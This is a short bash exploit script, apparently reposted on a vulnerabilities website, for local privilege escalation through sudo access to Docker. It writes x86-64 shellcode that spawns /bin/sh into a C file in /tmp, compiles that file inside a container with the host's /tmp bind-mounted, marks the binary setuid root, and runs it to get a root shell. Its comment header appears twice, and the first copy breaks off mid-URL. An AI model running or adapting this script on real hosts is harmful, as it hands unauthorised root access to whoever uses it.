#!/bin/bash
# SUDO Docker Privilege Escalation
# https://github.com/pyperanger/dockerevil
# SELINUX "bypass" using :z option
# https://docs.docker.com/engine #!/bin/bash
# SUDO Docker Privilege Escalation
# https://github.com/pyperanger/dockerevil
# SELINUX "bypass" using :z option
# https://docs.docker.com/engine/admin/volumes/bind-mounts/#configure-the-selinux-label
echo "[*] SUDO Docker Privilege Escalation";
echo "[+] Writing shellcode";
cat > /tmp/sud0-d0ck3r.c <<'EOF'
#include <unistd.h>
#include <stdlib.h>
unsigned char shellcode[] =
"x50x48x31xd2x48x31xf6x48xbbx2fx62x69x6ex2fx2fx73x68x53x54x5fxb0x3bx0fx05";
int main()
{
setgid(0);
setuid(0);
int (*ret)() = (int(*)())shellcode;
ret();
}
EOF
echo "[+] Compiling shellcode in container";
sudo docker run -t -v /tmp/:/tmp/:z pype/ubuntu_gcc /bin/sh -c 'gcc -fno-stack-protector -z execstack /tmp/sud0-d0ck3r.c -o /tmp/sud0-d0ck3r && chmod +xs /tmp/sud0-d0ck3r'
echo "[+] r00t sh3ll !";
/tmp/sud0-d0ck3r
Docker Sudo Privilege Escalation
- Details
- Written by: khalil shreateh
- Category: Vulnerabilities
- Hits: 410